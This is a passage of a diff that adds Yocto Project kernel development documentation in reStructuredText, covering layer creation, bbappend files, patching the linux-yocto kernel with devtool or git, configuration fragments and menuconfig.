+      Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
+
+   .. note::
+
+      For background information on working with common and BSP layers,
+      see the
+      ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+      section in the Yocto Project Development Tasks Manual and the
+      ":ref:`bsp-guide/bsp:bsp layers`" section in the Yocto Project Board
+      Support (BSP) Developer's Guide, respectively. For information on how to
+      use the ``bitbake-layers create-layer`` command to quickly set up a layer,
+      see the
+      ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+      section in the Yocto Project Development Tasks Manual.
+
+4. *Inform the BitBake Build Environment About Your Layer:* As directed
+   when you created your layer, you need to add the layer to the
+   :term:`BBLAYERS` variable in the
+   ``bblayers.conf`` file as follows:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake-layers add-layer ../../meta-mylayer
+      NOTE: Starting bitbake server ...
+      $
+
+5. *Create a Local Copy of the Kernel Git Repository:* You can find Git
+   repositories of supported Yocto Project kernels organized under
+   "Yocto Linux Kernel" in the Yocto Project Source Repositories at
+   :yocto_git:`/`.
+
+   For simplicity, it is recommended that you create your copy of the
+   kernel Git repository outside of the
+   :term:`Source Directory`, which is
+   usually named ``poky``. Also, be sure you are in the
+   ``standard/base`` branch.
+
+   The following commands show how to create a local copy of the
+   ``linux-yocto-4.12`` kernel and be in the ``standard/base`` branch.
+
+   .. note::
+
+      The ``linux-yocto-4.12`` kernel can be used with the Yocto Project 2.4
+      release and forward.
+      You cannot use the ``linux-yocto-4.12`` kernel with releases prior to
+      Yocto Project 2.4.
+
+   ::
+
+      $ cd ~
+      $ git clone git://git.yoctoproject.org/linux-yocto-4.12 --branch standard/base
+      Cloning into 'linux-yocto-4.12'...
+      remote: Counting objects: 6097195, done.
+      remote: Compressing objects: 100% (901026/901026), done.
+      remote: Total 6097195 (delta 5152604), reused 6096847 (delta 5152256)
+      Receiving objects: 100% (6097195/6097195), 1.24 GiB | 7.81 MiB/s, done.
+      Resolving deltas: 100% (5152604/5152604), done. Checking connectivity... done.
+      Checking out files: 100% (59846/59846), done.
+
+6. *Create a Local Copy of the Kernel Cache Git Repository:* For
+   simplicity, it is recommended that you create your copy of the kernel
+   cache Git repository outside of the
+   :term:`Source Directory`, which is
+   usually named ``poky``. Also, for this example, be sure you are in
+   the ``yocto-4.12`` branch.
+
+   The following commands show how to create a local copy of the
+   ``yocto-kernel-cache`` and be in the ``yocto-4.12`` branch:
+   ::
+
+      $ cd ~
+      $ git clone git://git.yoctoproject.org/yocto-kernel-cache --branch yocto-4.12
+      Cloning into 'yocto-kernel-cache'...
+      remote: Counting objects: 22639, done.
+      remote: Compressing objects: 100% (9761/9761), done.
+      remote: Total 22639 (delta 12400), reused 22586 (delta 12347)
+      Receiving objects: 100% (22639/22639), 22.34 MiB | 6.27 MiB/s, done.
+      Resolving deltas: 100% (12400/12400), done.
+      Checking connectivity... done.
+
+At this point, you are ready to start making modifications to the kernel
+using traditional kernel development steps. For a continued example, see
+the "`Using Traditional Kernel Development to Patch the
+Kernel <#using-traditional-kernel-development-to-patch-the-kernel>`__"
+section.
+
+Creating and Preparing a Layer
+==============================
+
+If you are going to be modifying kernel recipes, it is recommended that
+you create and prepare your own layer in which to do your work. Your
+layer contains its own :term:`BitBake`
+append files (``.bbappend``) and provides a convenient mechanism to
+create your own recipe files (``.bb``) as well as store and use kernel
+patch files. For background information on working with layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+.. note::
+
+   The Yocto Project comes with many tools that simplify tasks you need
+   to perform. One such tool is the ``bitbake-layers create-layer``
+   command, which simplifies creating a new layer. See the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+   section in the Yocto Project Development Tasks Manual for
+   information on how to use this script to quick set up a new layer.
+
+To better understand the layer you create for kernel development, the
+following section describes how to create a layer without the aid of
+tools. These steps assume creation of a layer named ``mylayer`` in your
+home directory:
+
+1. *Create Structure*: Create the layer's structure:
+   ::
+
+      $ cd $HOME
+      $ mkdir meta-mylayer
+      $ mkdir meta-mylayer/conf
+      $ mkdir meta-mylayer/recipes-kernel
+      $ mkdir meta-mylayer/recipes-kernel/linux
+      $ mkdir meta-mylayer/recipes-kernel/linux/linux-yocto
+
+   The ``conf`` directory holds your configuration files, while the
+   ``recipes-kernel`` directory holds your append file and eventual
+   patch files.
+
+2. *Create the Layer Configuration File*: Move to the
+   ``meta-mylayer/conf`` directory and create the ``layer.conf`` file as
+   follows:
+   ::
+
+      # We have a conf and classes directory, add to BBPATH
+      BBPATH .= ":${LAYERDIR}"
+
+      # We have recipes-* directories, add to BBFILES
+      BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+                  ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+      BBFILE_COLLECTIONS += "mylayer"
+      BBFILE_PATTERN_mylayer = "^${LAYERDIR}/"
+      BBFILE_PRIORITY_mylayer = "5"
+
+   Notice ``mylayer`` as part of the last three statements.
+
+3. *Create the Kernel Recipe Append File*: Move to the
+   ``meta-mylayer/recipes-kernel/linux`` directory and create the
+   kernel's append file. This example uses the ``linux-yocto-4.12``
+   kernel. Thus, the name of the append file is
+   ``linux-yocto_4.12.bbappend``:
+   ::
+
+      FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+      SRC_URI_append = " file://patch-file-one.patch"
+      SRC_URI_append = " file://patch-file-two.patch"
+      SRC_URI_append = " file://patch-file-three.patch"
+
+   The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
+   enable the OpenEmbedded build system to find patch files. For more
+   information on using append files, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+   section in the Yocto Project Development Tasks Manual.
+
+Modifying an Existing Recipe
+============================
+
+In many cases, you can customize an existing linux-yocto recipe to meet
+the needs of your project. Each release of the Yocto Project provides a
+few Linux kernel recipes from which you can choose. These are located in
+the :term:`Source Directory` in
+``meta/recipes-kernel/linux``.
+
+Modifying an existing recipe can consist of the following:
+
+- :ref:`kernel-dev/kernel-dev-common:creating the append file`
+
+- :ref:`kernel-dev/kernel-dev-common:applying patches`
+
+- :ref:`kernel-dev/kernel-dev-common:changing the configuration`
+
+Before modifying an existing recipe, be sure that you have created a
+minimal, custom layer from which you can work. See the "`Creating and
+Preparing a Layer <#creating-and-preparing-a-layer>`__" section for
+information.
+
+Creating the Append File
+------------------------
+
+You create this file in your custom layer. You also name it accordingly
+based on the linux-yocto recipe you are using. For example, if you are
+modifying the ``meta/recipes-kernel/linux/linux-yocto_4.12.bb`` recipe,
+the append file will typically be located as follows within your custom
+layer:
+
+.. code-block:: none
+
+   your-layer/recipes-kernel/linux/linux-yocto_4.12.bbappend
+
+The append file should initially extend the
+:term:`FILESPATH` search path by
+prepending the directory that contains your files to the
+:term:`FILESEXTRAPATHS`
+variable as follows:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+
+The path ``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``
+expands to "linux-yocto" in the current directory for this example. If
+you add any new files that modify the kernel recipe and you have
+extended ``FILESPATH`` as described above, you must place the files in
+your layer in the following area:
+::
+
+   your-layer/recipes-kernel/linux/linux-yocto/
+
+.. note::
+
+   If you are working on a new machine Board Support Package (BSP), be
+   sure to refer to the :doc:`../bsp-guide/bsp-guide`.
+
+As an example, consider the following append file used by the BSPs in
+``meta-yocto-bsp``:
+
+.. code-block:: none
+
+   meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend
+
+The following listing shows the file. Be aware that the actual commit ID
+strings in this example listing might be different than the actual
+strings in the file from the ``meta-yocto-bsp`` layer upstream.
+::
+
+   KBRANCH_genericx86  = "standard/base"
+   KBRANCH_genericx86-64  = "standard/base"
+
+   KMACHINE_genericx86 ?= "common-pc"
+   KMACHINE_genericx86-64 ?= "common-pc-64"
+   KBRANCH_edgerouter = "standard/edgerouter"
+   KBRANCH_beaglebone = "standard/beaglebone"
+
+   SRCREV_machine_genericx86    ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
+   SRCREV_machine_genericx86-64 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
+   SRCREV_machine_edgerouter ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
+   SRCREV_machine_beaglebone ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
+
+
+   COMPATIBLE_MACHINE_genericx86 = "genericx86"
+   COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
+   COMPATIBLE_MACHINE_edgerouter = "edgerouter"
+   COMPATIBLE_MACHINE_beaglebone = "beaglebone"
+
+   LINUX_VERSION_genericx86 = "4.12.7"
+   LINUX_VERSION_genericx86-64 = "4.12.7"
+   LINUX_VERSION_edgerouter = "4.12.10"
+   LINUX_VERSION_beaglebone = "4.12.10"
+
+This append file
+contains statements used to support several BSPs that ship with the
+Yocto Project. The file defines machines using the
+:term:`COMPATIBLE_MACHINE`
+variable and uses the
+:term:`KMACHINE` variable to ensure
+the machine name used by the OpenEmbedded build system maps to the
+machine name used by the Linux Yocto kernel. The file also uses the
+optional :term:`KBRANCH` variable to
+ensure the build process uses the appropriate kernel branch.
+
+Although this particular example does not use it, the
+:term:`KERNEL_FEATURES`
+variable could be used to enable features specific to the kernel. The
+append file points to specific commits in the
+:term:`Source Directory` Git repository and
+the ``meta`` Git repository branches to identify the exact kernel needed
+to build the BSP.
+
+One thing missing in this particular BSP, which you will typically need
+when developing a BSP, is the kernel configuration file (``.config``)
+for your BSP. When developing a BSP, you probably have a kernel
+configuration file or a set of kernel configuration files that, when
+taken together, define the kernel configuration for your BSP. You can
+accomplish this definition by putting the configurations in a file or a
+set of files inside a directory located at the same level as your
+kernel's append file and having the same name as the kernel's main
+recipe file. With all these conditions met, simply reference those files
+in the :term:`SRC_URI` statement in
+the append file.
+
+For example, suppose you had some configuration options in a file called
+``network_configs.cfg``. You can place that file inside a directory
+named ``linux-yocto`` and then add a ``SRC_URI`` statement such as the
+following to the append file. When the OpenEmbedded build system builds
+the kernel, the configuration options are picked up and applied.
+::
+
+   SRC_URI += "file://network_configs.cfg"
+
+To group related configurations into multiple files, you perform a
+similar procedure. Here is an example that groups separate
+configurations specifically for Ethernet and graphics into their own
+files and adds the configurations by using a ``SRC_URI`` statement like
+the following in your append file:
+::
+
+   SRC_URI += "file://myconfig.cfg \
+               file://eth.cfg \
+               file://gfx.cfg"
+
+Another variable you can use in your kernel recipe append file is the
+:term:`FILESEXTRAPATHS`
+variable. When you use this statement, you are extending the locations
+used by the OpenEmbedded system to look for files and patches as the
+recipe is processed.
+
+.. note::
+
+   Other methods exist to accomplish grouping and defining configuration
+   options. For example, if you are working with a local clone of the
+   kernel repository, you could checkout the kernel's ``meta`` branch,
+   make your changes, and then push the changes to the local bare clone
+   of the kernel. The result is that you directly add configuration
+   options to the ``meta`` branch for your BSP. The configuration
+   options will likely end up in that location anyway if the BSP gets
+   added to the Yocto Project.
+
+   In general, however, the Yocto Project maintainers take care of
+   moving the ``SRC_URI``-specified configuration options to the
+   kernel's ``meta`` branch. Not only is it easier for BSP developers to
+   not have to worry about putting those configurations in the branch,
+   but having the maintainers do it allows them to apply 'global'
+   knowledge about the kinds of common configuration options multiple
+   BSPs in the tree are typically using. This allows for promotion of
+   common configurations into common features.
+
+Applying Patches
+----------------
+
+If you have a single patch or a small series of patches that you want to
+apply to the Linux kernel source, you can do so just as you would with
+any other recipe. You first copy the patches to the path added to
+:term:`FILESEXTRAPATHS` in
+your ``.bbappend`` file as described in the previous section, and then
+reference them in :term:`SRC_URI`
+statements.
+
+For example, you can apply a three-patch series by adding the following
+lines to your linux-yocto ``.bbappend`` file in your layer:
+::
+
+   SRC_URI += "file://0001-first-change.patch"
+   SRC_URI += "file://0002-second-change.patch"
+   SRC_URI += "file://0003-third-change.patch"
+
+The next time you run BitBake to build
+the Linux kernel, BitBake detects the change in the recipe and fetches
+and applies the patches before building the kernel.
+
+For a detailed example showing how to patch the kernel using
+``devtool``, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections.
+
+Changing the Configuration
+--------------------------
+
+You can make wholesale or incremental changes to the final ``.config``
+file used for the eventual Linux kernel configuration by including a
+``defconfig`` file and by specifying configuration fragments in the
+:term:`SRC_URI` to be applied to that
+file.
+
+If you have a complete, working Linux kernel ``.config`` file you want
+to use for the configuration, as before, copy that file to the
+appropriate ``${PN}`` directory in your layer's ``recipes-kernel/linux``
+directory, and rename the copied file to "defconfig". Then, add the
+following lines to the linux-yocto ``.bbappend`` file in your layer:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+   SRC_URI += "file://defconfig"
+
+The ``SRC_URI`` tells the build system how to search
+for the file, while the
+:term:`FILESEXTRAPATHS`
+extends the :term:`FILESPATH`
+variable (search directories) to include the ``${PN}`` directory you
+created to hold the configuration changes.
+
+.. note::
+
+   The build system applies the configurations from the ``defconfig``
+   file before applying any subsequent configuration fragments. The
+   final kernel configuration is a combination of the configurations in
+   the ``defconfig`` file and any configuration fragments you provide. You need
+   to realize that if you have any configuration fragments, the build system
+   applies these on top of and after applying the existing ``defconfig`` file
+   configurations.
+
+Generally speaking, the preferred approach is to determine the
+incremental change you want to make and add that as a configuration
+fragment. For example, if you want to add support for a basic serial
+console, create a file named ``8250.cfg`` in the ``${PN}`` directory
+with the following content (without indentation):
+::
+
+   CONFIG_SERIAL_8250=y
+   CONFIG_SERIAL_8250_CONSOLE=y
+   CONFIG_SERIAL_8250_PCI=y
+   CONFIG_SERIAL_8250_NR_UARTS=4
+   CONFIG_SERIAL_8250_RUNTIME_UARTS=4
+   CONFIG_SERIAL_CORE=y
+   CONFIG_SERIAL_CORE_CONSOLE=y
+
+Next, include this
+configuration fragment and extend the ``FILESPATH`` variable in your
+``.bbappend`` file:
+::
+
+   FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+   SRC_URI += "file://8250.cfg"
+
+The next time you run BitBake to build the
+Linux kernel, BitBake detects the change in the recipe and fetches and
+applies the new configuration before building the kernel.
+
+For a detailed example showing how to configure the kernel, see the
+"`Configuring the Kernel <#configuring-the-kernel>`__" section.
+
+Using an "In-Tree"  ``defconfig`` File
+--------------------------------------
+
+It might be desirable to have kernel configuration fragment support
+through a ``defconfig`` file that is pulled from the kernel source tree
+for the configured machine. By default, the OpenEmbedded build system
+looks for ``defconfig`` files in the layer used for Metadata, which is
+"out-of-tree", and then configures them using the following:
+::
+
+   SRC_URI += "file://defconfig"
+
+If you do not want to maintain copies of
+``defconfig`` files in your layer but would rather allow users to use
+the default configuration from the kernel tree and still be able to add
+configuration fragments to the
+:term:`SRC_URI` through, for example,
+append files, you can direct the OpenEmbedded build system to use a
+``defconfig`` file that is "in-tree".
+
+To specify an "in-tree" ``defconfig`` file, use the following statement
+form:
+::
+
+   KBUILD_DEFCONFIG_KMACHINE ?= "defconfig_file"
+
+Here is an example
+that assigns the ``KBUILD_DEFCONFIG`` variable based on "raspberrypi2"
+and provides the path to the "in-tree" ``defconfig`` file to be used for
+a Raspberry Pi 2, which is based on the Broadcom 2708/2709 chipset:
+::
+
+   KBUILD_DEFCONFIG_raspberrypi2 ?= "bcm2709_defconfig"
+
+Aside from modifying your kernel recipe and providing your own
+``defconfig`` file, you need to be sure no files or statements set
+``SRC_URI`` to use a ``defconfig`` other than your "in-tree" file (e.g.
+a kernel's ``linux-``\ `machine`\ ``.inc`` file). In other words, if the
+build system detects a statement that identifies an "out-of-tree"
+``defconfig`` file, that statement will override your
+``KBUILD_DEFCONFIG`` variable.
+
+See the
+:term:`KBUILD_DEFCONFIG`
+variable description for more information.
+
+Using ``devtool`` to Patch the Kernel
+=====================================
+
+The steps in this procedure show you how you can patch the kernel using
+the extensible SDK and ``devtool``.
+
+.. note::
+
+   Before attempting this procedure, be sure you have performed the
+   steps to get ready for updating the kernel as described in the
+   ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+   section.
+
+Patching the kernel involves changing or adding configurations to an
+existing kernel, changing or adding recipes to the kernel that are
+needed to support specific hardware features, or even altering the
+source code itself.
+
+This example creates a simple patch by adding some QEMU emulator console
+output at boot time through ``printk`` statements in the kernel's
+``calibrate.c`` source code file. Applying the patch and booting the
+modified image causes the added messages to appear on the emulator's
+console. The example is a continuation of the setup procedure found in
+the ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``" Section.
+
+1. *Check Out the Kernel Source Files:* First you must use ``devtool``
+   to checkout the kernel source code in its workspace. Be sure you are
+   in the terminal set up to do work with the extensible SDK.
+
+   .. note::
+
+      See this step in the
+      ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+      section for more information.
+
+   Use the following ``devtool`` command to check out the code:
+   ::
+
+      $ devtool modify linux-yocto
+
+   .. note::
+
+      During the checkout operation, a bug exists that could cause
+      errors such as the following to appear:
+
+      .. code-block:: none
+
+              ERROR: Taskhash mismatch 2c793438c2d9f8c3681fd5f7bc819efa versus
+                     be3a89ce7c47178880ba7bf6293d7404 for
+                     /path/to/esdk/layers/poky/meta/recipes-kernel/linux/linux-yocto_4.10.bb.do_unpack
+
+
+      You can safely ignore these messages. The source code is correctly
+      checked out.
+
+2. *Edit the Source Files* Follow these steps to make some simple
+   changes to the source files:
+
+   1. *Change the working directory*: In the previous step, the output
+      noted where you can find the source files (e.g.
+      ``~/poky_sdk/workspace/sources/linux-yocto``). Change to where the
+      kernel source code is before making your edits to the
+      ``calibrate.c`` file:
+      ::
+
+         $ cd ~/poky_sdk/workspace/sources/linux-yocto
+
+   2. *Edit the source file*: Edit the ``init/calibrate.c`` file to have
+      the following changes:
+      ::
+
+         void calibrate_delay(void)
+         {
+             unsigned long lpj;
+             static bool printed;
+             int this_cpu = smp_processor_id();
+
+             printk("*************************************\n");
+             printk("*                                   *\n");
+             printk("*        HELLO YOCTO KERNEL         *\n");
+             printk("*                                   *\n");
+             printk("*************************************\n");
+
+             if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
+                   .
+                   .
+                   .
+
+3. *Build the Updated Kernel Source:* To build the updated kernel
+   source, use ``devtool``:
+   ::
+
+      $ devtool build linux-yocto
+
+4. *Create the Image With the New Kernel:* Use the
+   ``devtool build-image`` command to create a new image that has the
+   new kernel.
+
+   .. note::
+
+      If the image you originally created resulted in a Wic file, you
+      can use an alternate method to create the new image with the
+      updated kernel. For an example, see the steps in the
+      :yocto_wiki:`TipsAndTricks/KernelDevelopmentWithEsdk </wiki/TipsAndTricks/KernelDevelopmentWithEsdk>`
+      Wiki Page.
+
+   ::
+
+      $ cd ~
+      $ devtool build-image core-image-minimal
+
+5. *Test the New Image:* For this example, you can run the new image
+   using QEMU to verify your changes:
+
+   1. *Boot the image*: Boot the modified image in the QEMU emulator
+      using this command:
+      ::
+
+         $ runqemu qemux86
+
+   2. *Verify the changes*: Log into the machine using ``root`` with no
+      password and then use the following shell command to scroll
+      through the console's boot output.
+
+      .. code-block:: none
+
+         # dmesg | less
+
+      You should see
+      the results of your ``printk`` statements as part of the output
+      when you scroll down the console window.
+
+6. *Stage and commit your changes*: Within your eSDK terminal, change
+   your working directory to where you modified the ``calibrate.c`` file
+   and use these Git commands to stage and commit your changes:
+   ::
+
+      $ cd ~/poky_sdk/workspace/sources/linux-yocto
+      $ git status
+      $ git add init/calibrate.c
+      $ git commit -m "calibrate: Add printk example"
+
+7. *Export the Patches and Create an Append File:* To export your
+   commits as patches and create a ``.bbappend`` file, use the following
+   command in the terminal used to work with the extensible SDK. This
+   example uses the previously established layer named ``meta-mylayer``.
+   ::
+
+      $ devtool finish linux-yocto ~/meta-mylayer
+
+   .. note::
+
+      See Step 3 of the
+      ":ref:`kernel-dev/kernel-dev-common:getting ready to develop using \`\`devtool\`\``"
+      section for information on setting up this layer.
+
+   Once the command
+   finishes, the patches and the ``.bbappend`` file are located in the
+   ``~/meta-mylayer/recipes-kernel/linux`` directory.
+
+8. *Build the Image With Your Modified Kernel:* You can now build an
+   image that includes your kernel patches. Execute the following
+   command from your
+   :term:`Build Directory` in the terminal
+   set up to run BitBake:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake core-image-minimal
+
+Using Traditional Kernel Development to Patch the Kernel
+========================================================
+
+The steps in this procedure show you how you can patch the kernel using
+traditional kernel development (i.e. not using ``devtool`` and the
+extensible SDK as described in the
+":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+section).
+
+.. note::
+
+   Before attempting this procedure, be sure you have performed the
+   steps to get ready for updating the kernel as described in the
+   ":ref:`kernel-dev/kernel-dev-common:getting ready for traditional kernel development`"
+   section.
+
+Patching the kernel involves changing or adding configurations to an
+existing kernel, changing or adding recipes to the kernel that are
+needed to support specific hardware features, or even altering the
+source code itself.
+
+The example in this section creates a simple patch by adding some QEMU
+emulator console output at boot time through ``printk`` statements in
+the kernel's ``calibrate.c`` source code file. Applying the patch and
+booting the modified image causes the added messages to appear on the
+emulator's console. The example is a continuation of the setup procedure
+found in the "`Getting Ready for Traditional Kernel
+Development <#getting-ready-for-traditional-kernel-development>`__"
+Section.
+
+1. *Edit the Source Files* Prior to this step, you should have used Git
+   to create a local copy of the repository for your kernel. Assuming
+   you created the repository as directed in the "`Getting Ready for
+   Traditional Kernel
+   Development <#getting-ready-for-traditional-kernel-development>`__"
+   section, use the following commands to edit the ``calibrate.c`` file:
+
+   1. *Change the working directory*: You need to locate the source
+      files in the local copy of the kernel Git repository. Change to
+      where the kernel source code is before making your edits to the
+      ``calibrate.c`` file:
+      ::
+
+         $ cd ~/linux-yocto-4.12/init
+
+   2. *Edit the source file*: Edit the ``calibrate.c`` file to have the
+      following changes:
+      ::
+
+         void calibrate_delay(void)
+         {
+             unsigned long lpj;
+             static bool printed;
+             int this_cpu = smp_processor_id();
+
+             printk("*************************************\n");
+             printk("*                                   *\n");
+             printk("*        HELLO YOCTO KERNEL         *\n");
+             printk("*                                   *\n");
+             printk("*************************************\n");
+
+             if (per_cpu(cpu_loops_per_jiffy, this_cpu)) {
+                   .
+                   .
+                   .
+
+2. *Stage and Commit Your Changes:* Use standard Git commands to stage
+   and commit the changes you just made:
+   ::
+
+      $ git add calibrate.c
+      $ git commit -m "calibrate.c - Added some printk statements"
+
+   If you do not
+   stage and commit your changes, the OpenEmbedded Build System will not
+   pick up the changes.
+
+3. *Update Your local.conf File to Point to Your Source Files:* In
+   addition to your ``local.conf`` file specifying to use
+   "kernel-modules" and the "qemux86" machine, it must also point to the
+   updated kernel source files. Add
+   :term:`SRC_URI` and
+   :term:`SRCREV` statements similar
+   to the following to your ``local.conf``:
+   ::
+
+      $ cd ~/poky/build/conf
+
+   Add the following to the ``local.conf``:
+   ::
+
+      SRC_URI_pn-linux-yocto = "git:///path-to/linux-yocto-4.12;protocol=file;name=machine;branch=standard/base; \
+                                git:///path-to/yocto-kernel-cache;protocol=file;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
+      SRCREV_meta_qemux86 = "${AUTOREV}"
+      SRCREV_machine_qemux86 = "${AUTOREV}"
+
+   .. note::
+
+      Be sure to replace `path-to`
+      with the pathname to your local Git repositories. Also, you must
+      be sure to specify the correct branch and machine types. For this
+      example, the branch is ``standard/base`` and the machine is ``qemux86``.
+
+4. *Build the Image:* With the source modified, your changes staged and
+   committed, and the ``local.conf`` file pointing to the kernel files,
+   you can now use BitBake to build the image:
+   ::
+
+      $ cd ~/poky/build
+      $ bitbake core-image-minimal
+
+5. *Boot the image*: Boot the modified image in the QEMU emulator using
+   this command. When prompted to login to the QEMU console, use "root"
+   with no password:
+   ::
+
+      $ cd ~/poky/build
+      $ runqemu qemux86
+
+6. *Look for Your Changes:* As QEMU booted, you might have seen your
+   changes rapidly scroll by. If not, use these commands to see your
+   changes:
+
+   .. code-block:: none
+
+      # dmesg | less
+
+   You should see the results of your
+   ``printk`` statements as part of the output when you scroll down the
+   console window.
+
+7. *Generate the Patch File:* Once you are sure that your patch works
+   correctly, you can generate a ``*.patch`` file in the kernel source
+   repository:
+   ::
+
+      $ cd ~/linux-yocto-4.12/init
+      $ git format-patch -1
+      0001-calibrate.c-Added-some-printk-statements.patch
+
+8. *Move the Patch File to Your Layer:* In order for subsequent builds
+   to pick up patches, you need to move the patch file you created in
+   the previous step to your layer ``meta-mylayer``. For this example,
+   the layer created earlier is located in your home directory as
+   ``meta-mylayer``. When the layer was created using the
+   ``yocto-create`` script, no additional hierarchy was created to
+   support patches. Before moving the patch file, you need to add
+   additional structure to your layer using the following commands:
+   ::
+
+      $ cd ~/meta-mylayer
+      $ mkdir recipes-kernel
+      $ mkdir recipes-kernel/linux
+      $ mkdir recipes-kernel/linux/linux-yocto
+
+   Once you have created this
+   hierarchy in your layer, you can move the patch file using the
+   following command:
+   ::
+
+      $ mv ~/linux-yocto-4.12/init/0001-calibrate.c-Added-some-printk-statements.patch ~/meta-mylayer/recipes-kernel/linux/linux-yocto
+
+9. *Create the Append File:* Finally, you need to create the
+   ``linux-yocto_4.12.bbappend`` file and insert statements that allow
+   the OpenEmbedded build system to find the patch. The append file
+   needs to be in your layer's ``recipes-kernel/linux`` directory and it
+   must be named ``linux-yocto_4.12.bbappend`` and have the following
+   contents:
+   ::
+
+      FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
+      SRC_URI_append = " file://0001-calibrate.c-Added-some-printk-statements.patch"
+
+   The :term:`FILESEXTRAPATHS` and :term:`SRC_URI` statements
+   enable the OpenEmbedded build system to find the patch file.
+
+   For more information on append files and patches, see the "`Creating
+   the Append File <#creating-the-append-file>`__" and "`Applying
+   Patches <#applying-patches>`__" sections. You can also see the
+   ":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+   section in the Yocto Project Development Tasks Manual.
+
+   .. note::
+
+      To build ``core-image-minimal`` again and see the effects of your patch,
+      you can essentially eliminate the temporary source files saved in
+      ``poky/build/tmp/work/...`` and residual effects of the build by entering
+      the following sequence of commands:
+      ::
+
+              $ cd ~/poky/build
+              $ bitbake -c cleanall yocto-linux
+              $ bitbake core-image-minimal -c cleanall
+              $ bitbake core-image-minimal
+              $ runqemu qemux86
+
+
+Configuring the Kernel
+======================
+
+Configuring the Yocto Project kernel consists of making sure the
+``.config`` file has all the right information in it for the image you
+are building. You can use the ``menuconfig`` tool and configuration
+fragments to make sure your ``.config`` file is just how you need it.
+You can also save known configurations in a ``defconfig`` file that the
+build system can use for kernel configuration.
+
+This section describes how to use ``menuconfig``, create and use
+configuration fragments, and how to interactively modify your
+``.config`` file to create the leanest kernel configuration file
+possible.
+
+For more information on kernel configuration, see the "`Changing the
+Configuration <#changing-the-configuration>`__" section.
+
+Using  ``menuconfig``
+---------------------
+
+The easiest way to define kernel configurations is to set them through
+the ``menuconfig`` tool. This tool provides an interactive method with
+which to set kernel configurations. For general information on
+``menuconfig``, see https://en.wikipedia.org/wiki/Menuconfig.
+
+To use the ``menuconfig`` tool in the Yocto Project development
+environment, you must do the following:
+
+-  Because you launch ``menuconfig`` using BitBake, you must be sure to
+   set up your environment by running the
+   :ref:`structure-core-script` script found in
+   the :term:`Build Directory`.
+
+-  You must be sure of the state of your build's configuration in the
+   :term:`Source Directory`.
+
+-  Your build host must have the following two packages installed:
+   ::
+
+      libncurses5-dev
+      libtinfo-dev
+
+The following commands initialize the BitBake environment, run the
+:ref:`ref-tasks-kernel_configme`
+task, and launch ``menuconfig``. These commands assume the Source
+Directory's top-level folder is ``~/poky``:
+::
+
+   $ cd poky
+   $ source oe-init-build-env
+   $ bitbake linux-yocto -c kernel_configme -f
+   $ bitbake linux-yocto -c menuconfig
+
+Once ``menuconfig`` comes up, its standard
+interface allows you to interactively examine and configure all the
+kernel configuration parameters. After making your changes, simply exit
+the tool and save your changes to create an updated version of the
+``.config`` configuration file.
+
+.. note::
+
+   You can use the entire ``.config`` file as the ``defconfig`` file. For
+   information on ``defconfig`` files, see the
+   ":ref:`kernel-dev/kernel-dev-common:changing the configuration`",
+   ":ref:`kernel-dev/kernel-dev-common:using an "in-tree" \`\`defconfig\`\` file`",
+   and ":ref:`kernel-dev/kernel-dev-common:creating a \`\`defconfig\`\` file`"
+   sections.
+
+Consider an example that configures the "CONFIG_SMP" setting for the
+``linux-yocto-4.12`` kernel.
+
+.. note::
+
+   The OpenEmbedded build system recognizes this kernel as ``linux-yocto``
+   through Metadata (e.g. :term:`PREFERRED_VERSION`\ ``_linux-yocto ?= "12.4%"``).
+
+Once ``menuconfig`` launches, use the interface to navigate through the
+selections to find the configuration settings in which you are
+interested. For this example, you deselect "CONFIG_SMP" by clearing the
+"Symmetric Multi-Processing Support" option. Using the interface, you
+can find the option under "Processor Type and Features". To deselect
+"CONFIG_SMP", use the arrow keys to highlight "Symmetric
+Multi-Processing Support" and enter "N" to clear the asterisk. When you
+are finished, exit out and save the change.
+
+Saving the selections updates the ``.config`` configuration file. This
+is the file that the OpenEmbedded build system uses to configure the
+kernel during the build. You can find and examine this file in the Build
+Directory in ``tmp/work/``. The actual ``.config`` is located in the
+area where the specific kernel is built. For example, if you were
+building a Linux Yocto kernel based on the ``linux-yocto-4.12`` kernel
+and you were building a QEMU image targeted for ``x86`` architecture,
+the ``.config`` file would be:
+
+.. code-block:: none
+
+   poky/build/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+gitAUTOINC+eda4d18...
+   ...967-r0/linux-qemux86-standard-build/.config
+
+.. note::
+
